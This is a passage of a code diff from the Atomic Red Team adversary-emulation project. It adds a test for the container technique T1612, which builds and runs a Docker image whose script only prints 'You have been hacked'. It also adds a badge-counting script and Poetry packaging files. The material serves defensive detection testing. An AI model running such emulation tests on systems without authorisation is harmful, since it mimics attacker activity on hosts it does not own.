+      sudo systemctl status docker  --no-pager
+    get_prereq_command: |
+      sudo systemctl start docker
+  executor:
+    command: |-
+      docker build -t t1612  $PathtoAtomicsFolder/T1612/src/
+      docker run --name t1612_container  -d -t t1612
+      docker exec t1612_container ./test.sh
+    cleanup_command: |-
+      docker stop t1612_container
+      docker rmi -f t1612
+    name: sh

atomics/T1612/src/Dockerfile

@@ -0,0 +1,9 @@
+FROM ubuntu:20.04
+WORKDIR /
+LABEL key="CyberSecurity_project"
+RUN echo "CyberSecurity_project"
+RUN apt update && apt install -y git
+COPY test.sh /test.sh
+RUN chmod +x /test.sh
+ENTRYPOINT ["tail", "-f", "/dev/null"]
+

atomics/T1612/src/test.sh

@@ -0,0 +1,4 @@
+#!/usr/bin/bash
+
+echo "You have been hacked"
+

atomics/used_guids.txt

@@ -1257,3 +1257,43 @@ b8a563d4-a836-4993-a74e-0a19b8481bfe
 e62d23ef-3153-4837-8625-fa4a3829134d
 228c7498-be31-48e9-83b7-9cb906504ec8
 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
+bd13b9fc-b758-496a-b81a-397462f82c72
+830c8b6c-7a70-4f40-b975-8bbe74558acd
+d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6
+7a48f482-246f-4aeb-9837-21c271ebf244
+8dbfc15c-527b-4ab0-a272-019f469d367f
+3d257a03-eb80-41c5-b744-bb37ac7f65c7
+191db57d-091a-47d5-99f3-97fde53de505
+20b40ea9-0e17-4155-b8e6-244911a678ac
+433842ba-e796-4fd5-a14f-95d3a1970875
+ba1bf0b6-f32b-4db0-b7cc-d78cacc76700
+4097bc00-5eeb-4d56-aaf9-287d60351d95
+0434d081-bb32-42ce-bcbb-3548e4f2628f
+4f577511-dc1c-4045-bcb8-75d2457f01f4
+c955c1c7-3145-4a22-af2d-63eea0d967f0
+a5d8cdeb-be90-43a9-8b26-cc618deac1e0
+11ba69ee-902e-4a0f-b3b6-418aed7d7ddb
+e22a9e89-69c7-410f-a473-e6c212cd2292
+653d39cd-bae7-499a-898c-9fb96b8b5cd1
+6290f8a8-8ee9-4661-b9cf-390031bf6973
+c23bdb88-928d-493e-b46d-df2906a50941
+bc8eeb4a-cc3e-45ec-aa6e-41e973da2558
+0208ea60-98f1-4e8c-8052-930dce8f742c
+848e43b3-4c0a-4e4c-b4c9-d1e8cea9651c
+03013b4b-01db-437d-909b-1fdaa5010ee8
+86f0e4d5-3ca7-45fb-829d-4eda32b232bb
+b0768a5e-0f32-4e75-ae5b-d036edcf96b6
+810a465f-cd4f-47bc-b43e-d2de3b033ecc
+e62f8694-cbc7-468f-862c-b10cd07e1757
+ca50dd85-81ff-48ca-92e1-61f119cb1dcf
+c3a377f9-1203-4454-aa35-9d391d34768f
+12e5551c-8d5c-408e-b3e4-63f53b03379f
+fb4151a2-db33-4f8c-b7f8-78ea8790f961
+adae83d3-0df6-45e7-b2c3-575f91584577
+e3ad8e83-3089-49ff-817f-e52f8c948090
+2db30061-589d-409b-b125-7b473944f9b3
+878794f7-c511-4199-a950-8c28b3ed8e5b
+10ab786a-028e-4465-96f6-9e83ca6c5f24
+5cafd6c1-2f43-46eb-ac47-a5301ba0a618
+b3dacb6c-a9e3-44ec-bf87-38db60c5cad1
+f12acddb-7502-4ce6-a146-5b62c59592f1

bin/generate_counter.py

@@ -0,0 +1,35 @@
+import os
+import argparse
+import urllib.parse
+import yaml
+
+# Parse command line arguments
+parser = argparse.ArgumentParser(description='Generate an SVG counter for a folder with a list of YAML files.')
+parser.add_argument('-f', '--folder', metavar='FOLDER', type=str, default='atomics/', help='the folder to search for YAML files (default: atomics/)')
+args = parser.parse_args()
+
+# Find YAML files in the specified folder and subfolders
+test_count = 0
+for root, dirs, files in os.walk(args.folder):
+    for filename in files:
+        if filename.endswith('.yaml') and root.startswith(os.path.join(args.folder, 'T')):
+            with open(os.path.join(root, filename), 'r') as f:
+                yaml_data = yaml.safe_load(f)
+                if yaml_data is not None and 'atomic_tests' in yaml_data:
+                    test_count += len(yaml_data['atomic_tests'])
+
+# Generate the shields.io badge URL
+params = {
+    'label': 'Atomics',
+    'message': str(test_count),
+    'style': 'flat'
+}
+url = 'https://img.shields.io/badge/{}-{}-{}.svg'.format(
+    urllib.parse.quote_plus(params['label']),
+    urllib.parse.quote_plus(params['message']),
+    urllib.parse.quote_plus(params['style'])
+)
+
+# Print the shields.io badge URL
+print(url)
+

poetry.lock

@@ -0,0 +1,56 @@
+# This file is automatically @generated by Poetry 1.4.1 and should not be changed by hand.
+
+[[package]]
+name = "pyyaml"
+version = "6.0"
+description = "YAML parser and emitter for Python"
+category = "main"
+optional = false
+python-versions = ">=3.6"
+files = [
+    {file = "PyYAML-6.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:d4db7c7aef085872ef65a8fd7d6d09a14ae91f691dec3e87ee5ee0539d516f53"},
+    {file = "PyYAML-6.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:9df7ed3b3d2e0ecfe09e14741b857df43adb5a3ddadc919a2d94fbdf78fea53c"},
+    {file = "PyYAML-6.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:77f396e6ef4c73fdc33a9157446466f1cff553d979bd00ecb64385760c6babdc"},
+    {file = "PyYAML-6.0-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:a80a78046a72361de73f8f395f1f1e49f956c6be882eed58505a15f3e430962b"},
+    {file = "PyYAML-6.0-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:f84fbc98b019fef2ee9a1cb3ce93e3187a6df0b2538a651bfb890254ba9f90b5"},
+    {file = "PyYAML-6.0-cp310-cp310-win32.whl", hash = "sha256:2cd5df3de48857ed0544b34e2d40e9fac445930039f3cfe4bcc592a1f836d513"},
+    {file = "PyYAML-6.0-cp310-cp310-win_amd64.whl", hash = "sha256:daf496c58a8c52083df09b80c860005194014c3698698d1a57cbcfa182142a3a"},
+    {file = "PyYAML-6.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:d4b0ba9512519522b118090257be113b9468d804b19d63c71dbcf4a48fa32358"},
+    {file = "PyYAML-6.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:81957921f441d50af23654aa6c5e5eaf9b06aba7f0a19c18a538dc7ef291c5a1"},
+    {file = "PyYAML-6.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:afa17f5bc4d1b10afd4466fd3a44dc0e245382deca5b3c353d8b757f9e3ecb8d"},
+    {file = "PyYAML-6.0-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:dbad0e9d368bb989f4515da330b88a057617d16b6a8245084f1b05400f24609f"},
+    {file = "PyYAML-6.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:432557aa2c09802be39460360ddffd48156e30721f5e8d917f01d31694216782"},
+    {file = "PyYAML-6.0-cp311-cp311-win32.whl", hash = "sha256:bfaef573a63ba8923503d27530362590ff4f576c626d86a9fed95822a8255fd7"},
+    {file = "PyYAML-6.0-cp311-cp311-win_amd64.whl", hash = "sha256:01b45c0191e6d66c470b6cf1b9531a771a83c1c4208272ead47a3ae4f2f603bf"},
+    {file = "PyYAML-6.0-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:897b80890765f037df3403d22bab41627ca8811ae55e9a722fd0392850ec4d86"},
+    {file = "PyYAML-6.0-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:50602afada6d6cbfad699b0c7bb50d5ccffa7e46a3d738092afddc1f9758427f"},
+    {file = "PyYAML-6.0-cp36-cp36m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:48c346915c114f5fdb3ead70312bd042a953a8ce5c7106d5bfb1a5254e47da92"},
+    {file = "PyYAML-6.0-cp36-cp36m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:98c4d36e99714e55cfbaaee6dd5badbc9a1ec339ebfc3b1f52e293aee6bb71a4"},
+    {file = "PyYAML-6.0-cp36-cp36m-win32.whl", hash = "sha256:0283c35a6a9fbf047493e3a0ce8d79ef5030852c51e9d911a27badfde0605293"},
+    {file = "PyYAML-6.0-cp36-cp36m-win_amd64.whl", hash = "sha256:07751360502caac1c067a8132d150cf3d61339af5691fe9e87803040dbc5db57"},
+    {file = "PyYAML-6.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:819b3830a1543db06c4d4b865e70ded25be52a2e0631ccd2f6a47a2822f2fd7c"},
+    {file = "PyYAML-6.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:473f9edb243cb1935ab5a084eb238d842fb8f404ed2193a915d1784b5a6b5fc0"},
+    {file = "PyYAML-6.0-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:0ce82d761c532fe4ec3f87fc45688bdd3a4c1dc5e0b4a19814b9009a29baefd4"},
+    {file = "PyYAML-6.0-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:231710d57adfd809ef5d34183b8ed1eeae3f76459c18fb4a0b373ad56bedcdd9"},
+    {file = "PyYAML-6.0-cp37-cp37m-win32.whl", hash = "sha256:c5687b8d43cf58545ade1fe3e055f70eac7a5a1a0bf42824308d868289a95737"},
+    {file = "PyYAML-6.0-cp37-cp37m-win_amd64.whl", hash = "sha256:d15a181d1ecd0d4270dc32edb46f7cb7733c7c508857278d3d378d14d606db2d"},
+    {file = "PyYAML-6.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:0b4624f379dab24d3725ffde76559cff63d9ec94e1736b556dacdfebe5ab6d4b"},
+    {file = "PyYAML-6.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:213c60cd50106436cc818accf5baa1aba61c0189ff610f64f4a3e8c6726218ba"},
+    {file = "PyYAML-6.0-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:9fa600030013c4de8165339db93d182b9431076eb98eb40ee068700c9c813e34"},
+    {file = "PyYAML-6.0-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:277a0ef2981ca40581a47093e9e2d13b3f1fbbeffae064c1d21bfceba2030287"},
+    {file = "PyYAML-6.0-cp38-cp38-win32.whl", hash = "sha256:d4eccecf9adf6fbcc6861a38015c2a64f38b9d94838ac1810a9023a0609e1b78"},
+    {file = "PyYAML-6.0-cp38-cp38-win_amd64.whl", hash = "sha256:1e4747bc279b4f613a09eb64bba2ba602d8a6664c6ce6396a4d0cd413a50ce07"},
+    {file = "PyYAML-6.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:055d937d65826939cb044fc8c9b08889e8c743fdc6a32b33e2390f66013e449b"},
+    {file = "PyYAML-6.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:e61ceaab6f49fb8bdfaa0f92c4b57bcfbea54c09277b1b4f7ac376bfb7a7c174"},
+    {file = "PyYAML-6.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d67d839ede4ed1b28a4e8909735fc992a923cdb84e618544973d7dfc71540803"},
+    {file = "PyYAML-6.0-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:cba8c411ef271aa037d7357a2bc8f9ee8b58b9965831d9e51baf703280dc73d3"},
+    {file = "PyYAML-6.0-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:40527857252b61eacd1d9af500c3337ba8deb8fc298940291486c465c8b46ec0"},
+    {file = "PyYAML-6.0-cp39-cp39-win32.whl", hash = "sha256:b5b9eccad747aabaaffbc6064800670f0c297e52c12754eb1d976c57e4f74dcb"},
+    {file = "PyYAML-6.0-cp39-cp39-win_amd64.whl", hash = "sha256:b3d267842bf12586ba6c734f89d1f5b871df0273157918b0ccefa29deb05c21c"},
+    {file = "PyYAML-6.0.tar.gz", hash = "sha256:68fb519c14306fec9720a2a5b45bc9f0c8d1b9c72adf45c37baedfcd949c35a2"},
+]
+
+[metadata]
+lock-version = "2.0"
+python-versions = "^3.11"
+content-hash = "849e6d6d7360f5ed35d66cb6fb3bd11ec904da8b76a61511a183d6a2e01a153b"

pyproject.toml

@@ -0,0 +1,16 @@
+[tool.poetry]
+name = "atomic-red-team"
+version = "0.1.0"
+description = ""
+authors = ["Maintainers <opensource@redcanary.com"]
+readme = "README.md"
+packages = [{include = "atomic_red_team"}]
+
+[tool.poetry.dependencies]
+python = "^3.11"
+pyyaml = "^6.0"
+
+
+[build-system]
+requires = ["poetry-core"]
+build-backend = "poetry.core.masonry.api"